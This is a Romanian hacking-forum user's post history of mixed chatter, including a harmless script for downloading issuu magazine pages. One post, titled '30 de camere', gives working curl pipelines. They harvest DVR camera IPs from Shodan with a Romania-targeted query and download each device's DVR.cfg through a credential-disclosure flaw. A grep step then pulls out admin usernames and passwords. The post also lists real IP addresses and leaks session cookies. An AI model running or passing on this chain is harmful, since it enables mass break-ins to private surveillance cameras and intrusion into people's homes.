Jump to content

blech

Active Members
  • Posts

    1615
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by blech

  1. bravo pentru programel si sper sa fie cuiva folositor! LE: vad ca nu toti apreciaza glumele mele ) @mov_0ah_01 am editat postul ca sa nu le dau idei tampite unora care ii pot baga la belele.
  2. eu am impresia ca-ti bati joc de mine. tu vrei sa le folosesti pe post de proxy? sau vrei sa deschizi pe fiecare RDP cate un browser si sa automatizezi tu ceva in fiecare browser? daca vrei pe post de proxy nu ai nevoie de RDP-uri... este overkill in pana mea. este ca si cum mi-as cumpara un Alienware doar ca sa editez documente word.
  3. scrie aici in cuvinte in limba romana ce vrei sa faci si-ti explicam noi cum se face...daca stim. sau ne putem da cu parerea. nu fa si tu ca ala de l-am vazut acum 2 zile pe RST care vroia RDP dar el isi luase VPS pe linux. spune exact ce vrei si poate gasesti ajutor.
  4. sa ne dai si noua feedback...
  5. pot sa-l si fut de banii aia...oricum postul tau a fost fara rost. pretul nu se face in functie de volumul de munca ci in functie de cat bani scoate acel cacat. daca maine apare ca iarba de gazon trateaza cancerul tu crezi ca gazonul se mai vinde tot cu 12,5 lei/mp ?
  6. @Bit-ul esti la fel ca indienii daca ala este pretul nostru asta este, nu vad rostul comentariilor. ai postat ca pula doar ca sa te aflii in treaba.
  7. @bDyds raspunde la oameni...si raspunde si la ce te-am intrebat eu. si eu daca consider ca este ok sa ti-l fac si ca am timp pastrez pretul colegilor mei de 250$ la fel cu optiuni de rulare automata.
  8. care este valoarea itemului? valoarea din ziua curenta cu care s-a vandut itemul pe steam? asa ar fi normal...
  9. trebuie sa introduci carte de credit.
  10. subscriu la ce zice ice... am fost miercuri la film si nu are nici o treaba cu nimic. se vede de cacat pt ca e filmat cu niste camere digitale. nu am vazut nimic legat de hacker si blackhat... ma asteptam sa vad si eu ceva exploturi sau vreun atac nou din 2014 sau sa vad ca se folosesc de heartbleed sau ceva orice....NIMIC, ZERO, NADA. am vazut doar ca l-a pacalit pe ala de la NSA ca i-a trimis un mail spoofat de la seful lui cu un payload injectat in PDF...mizerie.
  11. salut, am fost nevoit sa fac acest script (pentru iubita) si m-am gandit sa-l impart si cu voi. issuu.com este un site unde se pot vizualiza tot felul de reviste din diverse domenii (unele full altele nu) si din pacate nu toti publisheri permit descarcare lor. ID_REVISTA="$(curl $1 | grep image_src | awk -F'/' '{print $4}')" i="1" mkdir $ID_REVISTA cd $ID_REVISTA/ while (( $i <= $2 )) do wget http://image.issuu.com/$ID_REVISTA/jpg/page_$i.jpg i=$(( i+1 )) done se executa ./script.sh link_revista nr_pagini_de_descarcat ex: ./script.sh ISSUU - DeskMonsters - October 2014 by DESKMONSTERS 22 puteti sa-l modificati cum vreti voi daca aveti nevoie. nu am stiut sa-l scriu altfel sau in alt limbaj. dupa executie creeaza un folder local cu ID-revista care este unic si in el varsa toate paginile selectate in format .JPG have fun! LE: multumesc adminului care a mutat postul. nu stiam exact unde sa-l pun
      • 2
      • Upvote
  12. am descarcat fisierul ala de pe mega... si vad ca lipseste un "k" din acel alfabet.
  13. ce contine pachetul descris de catre monlist.txt ?
  14. de pe cardul atasat contului de google
  15. blech

    30 de camere.

    pentru ca vineri si pentru ca lene am copiat requestul direct de la mine din browser cu cookie-ul si session-id-ul meu... o sa fie valid putin timp dar pentru un POC este suficient. curl "https://www.shodan.io/search?query=Basic+realm"%"3D"%"22DVR"%"22+server"%"3A+httpd+-mini" -H "dnt: 1" -H "accept-encoding: gzip, deflate, sdch" -H "accept-language: en-US,en;q=0.8" -H "user-agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "referer: https://www.shodan.io/" -H "cookie: __cfduid=dcc0d7c3112ff420a0f8bf085f509f5111412846945898; polito=""a7d885a4a27ba995f6203c45c98c2ecf548eccf751052e3c46614851070021e4""; _LOCmnALE_=None; _ga=GA1.2.871284508.1412846949; _gat=1" --compressed | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' | sort | uniq si primesti asta: 114.34.21.86 116.0.62.179 122.117.162.212 122.117.230.38 193.84.186.165 220.132.252.7 220.134.211.108 59.127.226.109 79.49.105.173 87.22.52.123 avand in vedere ca ma folosesc de vulnerabilitatea asta: Hunt CCTV Credential Disclosure ? Packet Storm poti modifica requestul in: curl "https://www.shodan.io/search?query=Basic+realm"%"3D"%"22DVR"%"22+server"%"3A+httpd+-mini" -H "dnt: 1" -H "accept-encoding: gzip, deflate, sdch" -H "accept-language: en-US,en;q=0.8" -H "user-agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "referer: https://www.shodan.io/" -H "cookie: __cfduid=dcc0d7c3112ff420a0f8bf085f509f5111412846945898; polito=""a7d885a4a27ba995f6203c45c98c2ecf548eccf751052e3c46614851070021e4""; _LOCmnALE_=None; _ga=GA1.2.871284508.1412846949; _gat=1" --compressed | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' | sort | uniq | while read line ; do curl -v http://$line/DVR.cfg ; done > config_camere.txt astfel incat sa descarcati cu CURL direct fisierele de config. si o sa vezi acolo ip camera, user, parola...etc. daca vreti sa o faceti ca la carte faceti requesturile folosind direct API-ul https://developer.shodan.io/api pentru ca in requestul meu este facut pull doar la prima pagina. ca sa-ti faci o idee am folosit dork-ul asta pentru shodan: country:ro Basic realm="DVR" server: httpd -mini se poate modifica dupa nevoie astfel incat sa targhetezi anumite zone... puteam adauga si "city:bucharest" daca ai folosi doar dork-ul principal fara filtre: Basic realm="DVR" server: httpd -mini Showing results 1 - 10 of 144,634 oricum ala de la CSD nu vroia sa se dea mare hacker...ce a aratat el la TV este pentru mase nu pentru noi care mai avem o idee despre ce cu ce se mananca. aia a fost doar publicitate. sper ca nu v-am dat prea multe idei acum sa incepeti sa va uitati la oameni prin casele lor ) @Aerosol LE: si ca sa nu va chinuiti sa cautati userul si parola prin config... cat fisier.txt | strings |grep -i WEB_ADMIN_
  16. blech

    30 de camere.

    sunt din RO? care este scopul?
  17. ma poate ajuta cineva in weekend sa fac un astfel de test?
  18. daca nu ma insel a mai fost postat pe RST ceva asemanator... si daca ai acces la /data poti direct sa urci alt pattern si nu-ti mai bati capul sa-l spargi. corect?
  19. te-ai trezit tarziu, nu are legatura cu versiunea de android ci cu felul in care a fost scrisa aplicatia stock pentru citirea sms-urilor. schimba aplicatia si totul o sa fie OK.
  20. ti-l fac cu 99
  21. a fost fun... l-am provocat si a cedat. si-a dat arama pe fata. avand in vedere ca nu s-a putut controla sub nici o forma nici fata de mine nici fata de restul eu zic ca este inutil acest thread. puteti sa-l inchideti va rog si sa-l mutati la trash? a fost un exercitiu bun de memorie sa ne aducem aminte ca si noi am avut 17 ani dar nu eram la fel de prosti.
  22. ID-uri baieti din Suceava - Andrei, 15 ani iesi acasa! nu vi tu sa-mi spui mie la varsta ta ca x si ca y si ca pula mea. metinare mars la jocurile tale Dau Yang Aici Pe Yang Corvus - Server 7 - Metin2 RO recapitulare... 1. primul post = no trust 2. nu prea e voie cu referal pe aici 3. joci metin 4. nu exista punctul 4
×
×
  • Create New...